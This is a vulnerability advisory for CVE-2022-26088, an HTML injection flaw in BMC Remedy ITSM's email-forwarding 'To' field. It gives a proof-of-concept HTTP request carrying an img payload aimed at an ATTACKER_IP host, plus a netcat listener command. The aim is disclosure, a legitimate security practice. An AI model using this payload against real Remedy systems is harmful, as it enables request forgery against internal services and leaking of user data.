Headline
CVE-2022-26088: HTML Injection in BMC Remedy ITSM-Suite
An issue was discovered in BMC Remedy before 22.1. Email-based Incident Forwarding allows remote authenticated users to inject HTML (such as an SSRF payload) into the Activity Log by placing it in the To: field. This affects rendering that occurs upon a click in the “number of recipients” field. NOTE: the vendor’s position is that “no real impact is demonstrated.”
The application BMC Remedy allows users to forward incidents via mail from the web interface. It is possible to inject HTML into the “To” field of the mail editor. Afterwards the application shows in the activity log that the incident was forwarded to <X> recipients. By clicking on the number of recipients the injected HTML is loaded and executed.
Vendor description
“Remedy IT Service Management Suite (Remedy ITSM Suite) and BMC Helix ITSM service provide out of-the-box IT Information Library (ITIL) service support functionality. Remedy ITSM Suite and BMC Helix ITSM service streamline and automate the processes around IT service desk, asset management, and change management operations. It also enables you to link your business services to your IT infrastructure to help you manage the impact of technology changes on business and business changes on technology — in real time and into the future. In addition, you can understand and optimize the user experience, balance current and future infrastructure investments, and view potential impact on the business by using a real-time service model.”
Source: https://docs.bmc.com/docs/itsm91/home-608490971.html
Business recommendation
The vendor provides an updated version which should be installed immediately.
The vendor states that:
- We have done hardening in version 22.1.
- However, we do not agree with assigning the CVE to this vulnerability.
- As mentioned previously this is an informative vulnerability, and no real impact is demonstrated.
Nevertheless, this can be used to trigger actions on internal services via CSRF or exfiltrate information.
Vulnerability overview/description****1) HTML Injection (CVE-2022-26088)
An authenticated attacker who can forward incidents per email is able to inject a limited set of HTML tags. This is accomplished by inserting arbitrary content into the “To:” field of the email. There is a filtering mechanism that prevents the injection of many HTML tags, for example <script>, and it also removes event handlers. An attacker is able to insert an image tag with an arbitrary src URL.
After sending the email, an entry is appended into the activity log of the incident which states that $USER has sent an email to <X> recipients. Upon clicking on the number <X>, the injected HTML code is loaded and executed.
By inserting an <img> with an arbitrary “src” attribute, an attacker can force the user’s browser to make requests to his specified URL. This can be used to trigger actions on internal services via CSRF or exfiltrate information.
Proof of concept****1) HTML Injection (CVE-2022-26088)
When an incident is viewed, there is a button which allows forwarding the incident by mail. After entering a TO address and the body of the email, it can be sent by clicking on the send button.
The HTML injection can be performed by intercepting this request and changing the ‘Email.To.InternetEmail’ parameter. The modified request is:
PUT /rest/incident/worknote/SOME_INCIDENT_ID HTTP/1.1
Host: TARGET
Cookie: […]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
X-Xsrf-Token: SOME_TOKEN
Content-Length: ADAPT_AS_NEEDED
Te: trailers
Connection: close
{
"worknote": "pentest",
"access": true,
"Email.From.Person": {
"email": "SOME_SENDING_MAIL",
"fullName": "Pentest - SEC Consult",
"loginId": "USERNAME"
},
"Email.Subject": "SOME_SUBJECT",
"Email.Body": "test2",
"Email.To.InternetEmail": "<img src=http: //ATTACKER_IP:8001/>[email protected]",
"workInfoType": 16000
}
The parameter Email.To.InternetEmail contains the payload. In this case an image tag containing the IP of the attacker was inserted:
"<img src=http: //LOCAL_IP:8001/>[email protected]"
The [email protected] is needed to pass the email validation step and example.test was used to prevent sending out real emails. After this step, the information that $USER has sent an email to 1 recipient will be appended in the activity log of this incident.
Now we start a local netcat listener with the command:
$ nc -vnlp 8001
Now we click on the number ‘1’ in the activity log and see that the browser issues a request to our ‘netcat’ instance. This confirms that the browser tries to load the image from the specified URL.
Vulnerable / tested versions
The following version has been tested:
- 9.1.10 this corresponds to version 20.02 as stated at the following URL https://community.bmc.com/s/news/aA33n000000CmmSCAS/remedy-version-mapping
Vendor contact timeline
Solution
Upgrade to version 22.1 or later which can be downloaded at the vendor’s page:
https://www.bmc.com/support/resources/product-downloads.html
Workaround
None
Advisory URL
https://sec-consult.com/vulnerability-lab/
EOF Daniel Hirschberger / @2022
Interested to work with the experts of SEC Consult? Send us your application
Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices
Related news
BMC Remedy ITSM-Suite version 9.1.10 (20.02 in new versioning scheme) suffers from an html injection vulnerability.